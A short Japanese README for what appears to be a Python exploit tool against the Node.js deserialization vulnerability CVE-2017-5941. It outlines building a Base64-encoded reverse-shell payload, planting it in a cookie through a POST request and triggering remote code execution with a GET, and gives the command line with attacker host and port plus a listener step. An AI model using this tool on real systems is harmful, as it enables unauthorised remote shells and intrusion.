
NodeJsのデシリアライゼーション脆弱性を利用したリバースシェルエクスプロイト(CVE-2017-5941)
このエクスプロイトは、自動的にリバースシェルのペイロードを生成します。ペイロードは10進数にエンコードされ、その後Base64にエンコードされます。 その後、このペイロードはHTTP POSTリクエストを介して送信され、ユーザーの入力をシリアライズしてクッキーに保存します。 そして、GETリクエストを介してアクセスすることでRCEを達成します。
使用方法:
python3 nodejshell.py <lhost> <lport>
lhost: あなたのローカルIPアドレス lport: リバースシェルを接続したいポート
その後、いくつかの簡単な情報を提供する必要があります:
これで、お好みの リスナー を起動して、接続が来るのを待つだけです。
